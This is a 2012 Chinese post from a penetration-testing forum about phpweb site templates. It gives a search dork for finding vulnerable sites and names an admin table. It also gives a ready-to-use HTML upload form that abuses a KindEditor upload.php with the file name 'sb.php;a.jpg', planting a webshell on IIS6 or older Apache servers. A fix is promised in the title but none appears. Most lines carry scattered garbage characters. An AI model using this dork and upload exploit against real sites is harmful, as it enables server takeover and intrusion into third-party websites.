中国网络渗透测试联盟

标题: phpweb成品网站全版本通杀注入漏洞及修复 [打印本页]

作者: admin    时间: 2012-11-9 20:52
标题: phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id) O6 h5 T' k7 }6 I! d4 r! I

- L& S3 ~/ u9 }5 S& L6 t) G8 t数据表:pwn_base_admin
8 o9 g& N% g7 d1 ?, M
9 s5 ?" q' `9 ?, i; a& O关于拿shell: b& X9 I0 B# ]4 I  @( l6 U
/ _9 ^, v4 A2 a  V
首先登录后台admin.php& D5 d( P; @! P6 X" s; h0 r# ?

- U" X5 K+ ?. \6 G3 ?8 e/ S看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
4 Y' K2 a, J+ ^1 q4 [$ p/ s换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
$ v4 N( e/ H: t8 f然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
! ]; N1 _. u5 I0 ~<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
5 O& f$ C- b+ _, Y( t<input type="text" name="fileName" value="sb.php;a.jpg" /> + `: l' }4 V/ E9 P) V' H3 Z
<input type="hidden" name="attachPath" value="news/pics/" /> , V5 J) p+ d! d: G! r6 d
<input type="file" name="fileData" size="14" /></td> 6 J" u# a+ J; f  ], s$ a
<input type="submit" name="button" value="确定" />
4 U- ~/ ]  L8 l/ S) l</form>
: e1 [/ i$ x. F" ~2 A+ b1 h 1 `" b* O7 L; b- B
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
( b, B- @5 ?3 a- c6 Z
" C2 D2 K% i. w1 r




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2